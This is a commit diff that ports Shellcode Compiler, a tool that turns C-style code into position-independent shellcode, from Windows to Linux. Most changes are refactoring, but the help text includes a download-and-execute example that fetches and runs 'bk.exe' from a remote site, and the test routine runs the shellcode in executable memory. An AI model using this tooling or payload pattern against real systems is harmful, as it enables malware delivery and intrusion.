Initial port to Linux

NytroRST · NytroRST · commit 2cc102f55b8d · 2019-07-31T00:21:02.000+03:00
diff --git a/Release/ShellcodeCompiler_x64.exe b/Release/ShellcodeCompiler_x64.exe
diff --git a/Release/ShellcodeCompiler_x86.exe b/Release/ShellcodeCompiler_x86.exe
diff --git a/ShellcodeCompiler/CommandLine.cpp b/ShellcodeCompiler/CommandLine.cpp
@@ -3,7 +3,7 @@
 
 // Program version
 
-#define PROGRAM_VERSION "v0.2 Alpha"
+#define PROGRAM_VERSION "v2.0 Alpha"
 
 // Global variable for command line arguments
 
@@ -33,13 +33,14 @@ void CommandLine::PrintHelp(string p_sFile)
 	cout << "NytroSecurity [ nytrosecurity.com ]" << endl << endl;
 
 	cout << "Program description" << endl;
-	cout << "-------------------" << endl;
-	cout << "\tShellcode Compiler is a program that compiles C/C++ style code " << endl;
-	cout << "into a small, position-independent and NULL-free shellcode for Windows." << endl;
-	cout << "It is possible to call any Windows API function in a user-friendly way." << endl << endl;
+	cout << "-------------------" << endl << endl;
+	cout << "\tShellcode Compiler is a program that compiles C/C++ style code into a small, " << endl;
+	cout << "\tposition-independent and NULL-free shellcode for Windows (x86 and x64) and " << endl;
+	cout << "\tLinux(x86 and x64). It is possible to call any Windows API function or Linux " << endl;
+	cout << "\tsyscall in a user - friendly way. " << endl << endl;
 
 	cout << "Command line options " << endl;
-	cout << "--------------------" << endl;
+	cout << "--------------------" << endl << endl;
 	cout << "\t-h (--help)      : Show this help message" << endl;
 	cout << "\t-p (--platform)  : Shellcode platform: win_x86,win_x64,linux_x86,linux_x64" << endl;
 	cout << "\t-v (--verbose)   : Print detailed output" << endl;
@@ -48,18 +49,27 @@ void CommandLine::PrintHelp(string p_sFile)
 	cout << "\t-o (--output)    : Output file of the generated binary shellcode" << endl;
 	cout << "\t-a (--assembbly) : Output file of the generated assembly code" << endl << endl;
 
-	cout << "Source code example" << endl;
-	cout << "-------------------" << endl << endl;
+	cout << "Windows example" << endl;
+	cout << "---------------" << endl << endl;
 	cout << "\tfunction URLDownloadToFileA(\"urlmon.dll\");" << endl;
 	cout << "\tfunction WinExec(\"kernel32.dll\");" << endl;
 	cout << "\tfunction ExitProcess(\"kernel32.dll\");" << endl << endl;
 	cout << "\tURLDownloadToFileA(0,\"https://site.com/bk.exe\",\"bk.exe\",0,0);" << endl;
 	cout << "\tWinExec(\"bk.exe\",0);" << endl;
 	cout << "\tExitProcess(0);" << endl << endl;
 
+	cout << "Linux example" << endl;
+	cout << "-------------" << endl << endl;
+	cout << "\tchmod(\"/root/chmodme\", 511);" << endl;
+	cout << "\twrite(1, \"Hello, world\", 12);" << endl;
+	cout << "\tkill(1661, 9);" << endl;
+	cout << "\tgetpid();" << endl;
+	cout << "\texecve(\"/usr/bin/burpsuite\", 0, 0);" << endl;
+	cout << "\texit(2" << endl << endl;
+
 	cout << "Invocation example" << endl;
-	cout << "------------------" << endl;
-	cout << "\t" << p_sFile << " -r Source.txt -o Shellcode.bin -a Assembly.asm" << endl;
+	cout << "------------------" << endl << endl;
+	cout << "\t" << p_sFile << " -p windows_x64 -r Source.txt -o Shellcode.bin -a Assembly.asm" << endl << endl;
 }
 
 // Parse command line arguments
@@ -165,33 +175,29 @@ void CommandLine::ParseCommandLine(int argc, char *argv[])
 
 	if (g_bVerbose) DebugUtils::DumpAllData();
 
+	// Compile all data
+
+	string sASMOutput = Compile::CompileAllData();
+
 	// Output ASM file
 
 	if (g_bASMFile)
 	{
 		if (Utils::FileExists(g_sASMFile)) Utils::DeleteSourceFile(g_sASMFile);
-		Compile::CompileAllData(g_sASMFile);
-	}
-	else
-	{
-		string sFile = Utils::GetTemp();
-		sFile += "\\SC.asm";
-		g_sASMFile = sFile;
-		if (Utils::FileExists(g_sASMFile)) Utils::DeleteSourceFile(g_sASMFile);
-		Compile::CompileAllData(sFile);
+		Utils::WriteToFile(g_sASMFile, sASMOutput);
 	}
 
 	// Output file
 
 	if (!g_bOutputFile)
-		g_sOutputFile = "SC2.bin";
+		g_sOutputFile = "Shellcode.bin";
 
 	if (Utils::FileExists(g_sOutputFile)) Utils::DeleteSourceFile(g_sOutputFile);
 
 	// Compile using Keystone engine
 
 	size_t nAssembledSize = 0;
-	unsigned char *pcAssembled = KeystoneLib::Assemble(&nAssembledSize, Utils::ReadSourceFile(g_sASMFile));
+	unsigned char *pcAssembled = KeystoneLib::Assemble(&nAssembledSize, sASMOutput);
 
 	if (nAssembledSize == 0)
 	{
@@ -214,7 +220,14 @@ void CommandLine::ParseCommandLine(int argc, char *argv[])
 	if (g_bTest)
 	{
 		cout << endl << "Testing shellcode..." << endl;
-		Sleep(3000);
+
+		// Cross platform sleeping (be sure output file is written)
+
+#if defined(_WIN32)
+		Sleep(1000);
+#else 
+		sleep(1);
+#endif 
 		DebugUtils::TestShellcode(g_sOutputFile);
 	}
 }
diff --git a/ShellcodeCompiler/CommandLine.h b/ShellcodeCompiler/CommandLine.h
@@ -5,6 +5,12 @@
 #include <string>
 #include <iostream>
 
+#if defined(_WIN32)
+#include <Windows.h>
+#else 
+#include <unistd.h>
+#endif
+
 #include "Utils.h"
 #include "Compile.h"
 #include "DebugUtils.h"
diff --git a/ShellcodeCompiler/Compile.cpp b/ShellcodeCompiler/Compile.cpp
@@ -141,8 +141,10 @@ bool Compile::ParseFile(string p_sFileData)
 
 // Compile all parsed data into ASM file
 
-void Compile::CompileAllData(string p_sOutput)
+string Compile::CompileAllData()
 {
+	string sOutput = "";
+	
 	// Compile for Windows
 
 	if (Platform::GetPlatform() == PLATFORM_TYPE_LINUX_X86 || Platform::GetPlatform() == PLATFORM_TYPE_LINUX_X64)
@@ -151,32 +153,34 @@ void Compile::CompileAllData(string p_sOutput)
 
 		for (size_t i = 0; i < FunctionCalls::AllFunctionCalls.size(); i++)
 		{
-			Utils::WriteToFile(p_sOutput, FunctionCalls::GenerateFunctionCall(FunctionCalls::AllFunctionCalls[i]));
+			sOutput += FunctionCalls::GenerateFunctionCall(FunctionCalls::AllFunctionCalls[i]);
 		}
 	}
 	else
 	{
-		Utils::WriteToFile(p_sOutput, ASMHeader::GetASMHeader());
+		sOutput += ASMHeader::GetASMHeader();
 
 		// Generate LoadLibrary for all DLLs (from declared functions)
 
 		for (size_t i = 0; i < DeclaredFunctions::AllDeclaredFunctions.size(); i++)
 		{
-			Utils::WriteToFile(p_sOutput, DeclaredFunctions::GenerateLoadLibraryCall(DeclaredFunctions::AllDeclaredFunctions[i].DLL));
+			sOutput += DeclaredFunctions::GenerateLoadLibraryCall(DeclaredFunctions::AllDeclaredFunctions[i].DLL);
 		}
 
 		// Generate GetProcAddress for all declared functions
 
 		for (size_t i = 0; i < DeclaredFunctions::AllDeclaredFunctions.size(); i++)
 		{
-			Utils::WriteToFile(p_sOutput, DeclaredFunctions::GenerateGetProcAddressCall(DeclaredFunctions::AllDeclaredFunctions[i].DLL, DeclaredFunctions::AllDeclaredFunctions[i].Name));
+			sOutput += DeclaredFunctions::GenerateGetProcAddressCall(DeclaredFunctions::AllDeclaredFunctions[i].DLL, DeclaredFunctions::AllDeclaredFunctions[i].Name);
 		}
 
 		// Generate function calls for all function calls
 
 		for (size_t i = 0; i < FunctionCalls::AllFunctionCalls.size(); i++)
 		{
-			Utils::WriteToFile(p_sOutput, FunctionCalls::GenerateFunctionCall(FunctionCalls::AllFunctionCalls[i]));
+			sOutput += FunctionCalls::GenerateFunctionCall(FunctionCalls::AllFunctionCalls[i]);
 		}
 	}
+
+	return sOutput;
 }
diff --git a/ShellcodeCompiler/Compile.h b/ShellcodeCompiler/Compile.h
@@ -25,9 +25,9 @@ class Compile
 
 	static bool ParseFile(string p_sFileData);
 
-	// Compile all parsed data into ASM file
+	// Compile all parsed data into ASM string
 
-	static void CompileAllData(string p_sOutput);
+	static string CompileAllData();
 };
 
 #endif
diff --git a/ShellcodeCompiler/DebugUtils.cpp b/ShellcodeCompiler/DebugUtils.cpp
@@ -1,6 +1,13 @@
 
 #include "DebugUtils.h"
-#include "SEHUtils.h"
+
+#if defined(_WIN32)
+	#include "SEHUtils.h"
+#else 
+	#include <cstdlib>
+	#include <cstring>
+	#include <sys/mman.h>
+#endif
 
 // Dump all data - debug purposes
 
@@ -43,6 +50,8 @@ void DebugUtils::TestShellcode(string p_sFilename)
 		return;
 	}
 
+#if defined(_WIN32)
+
 	// Get space for shellcode
 
 	void *sc = VirtualAlloc(0, size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
@@ -65,5 +74,23 @@ void DebugUtils::TestShellcode(string p_sFilename)
 		cout << "Error when executing shellcode: "
 			 << e.what() << endl;
 	}
+
+#else 
+
+	// Test shellcode on Linux
+
+	unsigned char *sc = (unsigned char*)valloc(size);
+
+	if (sc == NULL)
+	{
+		cout << "Error: Cannot allocate space for shellcode!" << endl;
+		return;
+	}
+
+	memcpy(sc, p, size);
+	mprotect(sc, size, PROT_READ | PROT_EXEC);
+	(*(int(*)())sc)();
+
+#endif
 }
 
diff --git a/ShellcodeCompiler/KeystoneLib.h b/ShellcodeCompiler/KeystoneLib.h
@@ -3,6 +3,7 @@
 
 #include <string>
 #include <iostream>
+#include <cstring>
 
 #include "Platform.h"
 
diff --git a/ShellcodeCompiler/Utils.cpp b/ShellcodeCompiler/Utils.cpp
@@ -1,35 +1,24 @@
 
 #include "Utils.h"
 
-// Get current working directory
-
-string Utils::GetCurrentDir()
-{
-	char buffer[1024];
-	string sContent = "";
-
-	DWORD r = GetCurrentDirectory(1024, buffer);
-
-	if (r == 0) return "";
-	sContent = buffer;
-
-	return sContent;
-}
-
 // Check if a file exists
 
 bool Utils::FileExists(string p_sPath)
 {
-	DWORD dwAttrib = GetFileAttributes(p_sPath.c_str());
-
-	return (dwAttrib != INVALID_FILE_ATTRIBUTES);
+	if (FILE * file = fopen(p_sPath.c_str(), "r")) {
+		fclose(file);
+		return true;
+	}
+	else {
+		return false;
+	}
 }
 
 // Delete a file
 
 bool Utils::DeleteSourceFile(string p_sFile)
 {
-	return (bool)DeleteFile(p_sFile.c_str());
+	return (bool)remove(p_sFile.c_str());
 }
 
 // Function used to read a file
@@ -179,21 +168,6 @@ bool Utils::IsString(char p_cCharacter)
 		p_cCharacter != '"' && p_cCharacter != ')' && p_cCharacter != '(' && p_cCharacter != ',');
 }
 
-// Get TEMP folder
-
-string Utils::GetTemp()
-{
-	char buffer[1024];
-	string sContent = "";
-
-	DWORD r = GetTempPath(1024, buffer);
-
-	if (r == 0) return "";
-	sContent = buffer;
-
-	return sContent;
-}
-
 // Function to convert a string to lower
 
 string Utils::ToLower(string p_sString)
diff --git a/ShellcodeCompiler/Utils.h b/ShellcodeCompiler/Utils.h
@@ -4,7 +4,7 @@
 
 #define _CRT_SECURE_NO_WARNINGS
 
-#include <Windows.h>
+#include <cstdio>
 #include <string>
 #include <iostream>
 #include <sstream>
@@ -19,7 +19,6 @@ class Utils
 
 	// All utilities
 
-	static string GetCurrentDir();
 	static bool   FileExists(string p_sPath);
 	static bool   DeleteSourceFile(string p_sFile);
 	static string ReadSourceFile(string p_sFilename);
@@ -30,7 +29,6 @@ class Utils
 	static string CharToHexString(char p_cChar);
 	static string IntToHexString(size_t p_iNumber);
 	static bool   IsString(char p_cCharacter);
-	static string GetTemp();
 	static string ToLower(string p_sString);
 };
 
diff --git a/ShellcodeCompiler/stdafx.cpp b/ShellcodeCompiler/stdafx.cpp
@@ -2,7 +2,9 @@
 // ShellcodeCompiler.pch will be the pre-compiled header
 // stdafx.obj will contain the pre-compiled type information
 
+#if defined(_WIN32)
 #include "stdafx.h"
+#endif
 
 // TODO: reference any additional headers you need in STDAFX.H
 // and not in this file
diff --git a/ShellcodeCompiler/stdafx.h b/ShellcodeCompiler/stdafx.h
@@ -5,11 +5,10 @@
 
 #pragma once
 
+#if defined(_WIN32)
 #include "targetver.h"
-
 #include <stdio.h>
 #include <tchar.h>
-
-
+#endif
 
 // TODO: reference additional headers your program requires here

Original file line number	Diff line number	Diff line change
`@@ -141,8 +141,10 @@ bool Compile::ParseFile(string p_sFileData)`
`141`	`141`
`142`	`142`	`// Compile all parsed data into ASM file`
`143`	`143`
`144`		`-void Compile::CompileAllData(string p_sOutput)`
	`144`	`+string Compile::CompileAllData()`
`145`	`145`	`{`
	`146`	`+ string sOutput = "";`
	`147`	`+`
`146`	`148`	`// Compile for Windows`
`147`	`149`
`148`	`150`	`if (Platform::GetPlatform() == PLATFORM_TYPE_LINUX_X86 \|\| Platform::GetPlatform() == PLATFORM_TYPE_LINUX_X64)`
`@@ -151,32 +153,34 @@ void Compile::CompileAllData(string p_sOutput)`
`151`	`153`
`152`	`154`	`for (size_t i = 0; i < FunctionCalls::AllFunctionCalls.size(); i++)`
`153`	`155`	`{`
`154`		`- Utils::WriteToFile(p_sOutput, FunctionCalls::GenerateFunctionCall(FunctionCalls::AllFunctionCalls[i]));`
	`156`	`+ sOutput += FunctionCalls::GenerateFunctionCall(FunctionCalls::AllFunctionCalls[i]);`
`155`	`157`	`}`
`156`	`158`	`}`
`157`	`159`	`else`
`158`	`160`	`{`
`159`		`- Utils::WriteToFile(p_sOutput, ASMHeader::GetASMHeader());`
	`161`	`+ sOutput += ASMHeader::GetASMHeader();`
`160`	`162`
`161`	`163`	`// Generate LoadLibrary for all DLLs (from declared functions)`
`162`	`164`
`163`	`165`	`for (size_t i = 0; i < DeclaredFunctions::AllDeclaredFunctions.size(); i++)`
`164`	`166`	`{`
`165`		`- Utils::WriteToFile(p_sOutput, DeclaredFunctions::GenerateLoadLibraryCall(DeclaredFunctions::AllDeclaredFunctions[i].DLL));`
	`167`	`+ sOutput += DeclaredFunctions::GenerateLoadLibraryCall(DeclaredFunctions::AllDeclaredFunctions[i].DLL);`
`166`	`168`	`}`
`167`	`169`
`168`	`170`	`// Generate GetProcAddress for all declared functions`
`169`	`171`
`170`	`172`	`for (size_t i = 0; i < DeclaredFunctions::AllDeclaredFunctions.size(); i++)`
`171`	`173`	`{`
`172`		`- Utils::WriteToFile(p_sOutput, DeclaredFunctions::GenerateGetProcAddressCall(DeclaredFunctions::AllDeclaredFunctions[i].DLL, DeclaredFunctions::AllDeclaredFunctions[i].Name));`
	`174`	`+ sOutput += DeclaredFunctions::GenerateGetProcAddressCall(DeclaredFunctions::AllDeclaredFunctions[i].DLL, DeclaredFunctions::AllDeclaredFunctions[i].Name);`
`173`	`175`	`}`
`174`	`176`
`175`	`177`	`// Generate function calls for all function calls`
`176`	`178`
`177`	`179`	`for (size_t i = 0; i < FunctionCalls::AllFunctionCalls.size(); i++)`
`178`	`180`	`{`
`179`		`- Utils::WriteToFile(p_sOutput, FunctionCalls::GenerateFunctionCall(FunctionCalls::AllFunctionCalls[i]));`
	`181`	`+ sOutput += FunctionCalls::GenerateFunctionCall(FunctionCalls::AllFunctionCalls[i]);`
`180`	`182`	`}`
`181`	`183`	`}`
	`184`	`+`
	`185`	`+ return sOutput;`
`182`	`186`	`}`